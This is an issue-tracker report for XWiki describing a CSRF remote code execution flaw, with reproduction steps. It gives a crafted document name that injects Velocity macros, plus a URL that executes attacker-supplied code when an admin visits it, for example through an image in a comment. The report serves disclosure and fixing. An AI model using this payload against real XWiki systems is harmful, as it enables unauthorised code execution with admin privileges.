XWiki Platform / XWIKI-21416

CSRF remote code execution through scheduler job's document reference


Details

    • Pull Request accepted

    Description

      Steps to reproduce:

      1. As a user without script, admin or programming right but regular edit right, create a document with reference
        ">]]{{/html}}{{async context="request.parameters"}}{{velocity}}#evaluate($request.eval).WebHome

        URL for easier creation: http://localhost:8080/xwiki/bin/view/%22%3E%5D%5D%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request/eval%29/

      2. Add an object of type XWiki.SchedulerJobClass
      3. Save
      4. Get an admin to visit http://localhost:8080/xwiki/bin/view/Scheduler/?eval=$services.logging.getLogger(%22attacker%22).error(%22Hello%20from%20URL%20Parameter!%20I%20got%20programming:%20$services.security.authorization.hasAccess(%27programming%27)%22) - e.g., write a comment with an image with that URL.

      Expected result:

      The Scheduler page is normally displayed and no error is logged.

      Actual result:

      An error "ERROR attacker - Hello from URL Parameter! I got programming: true" is logged. The layout of the job scheduler page is broken.

            People

              pjeanjean Pierre Jeanjean
              MichaelHamann Michael Hamann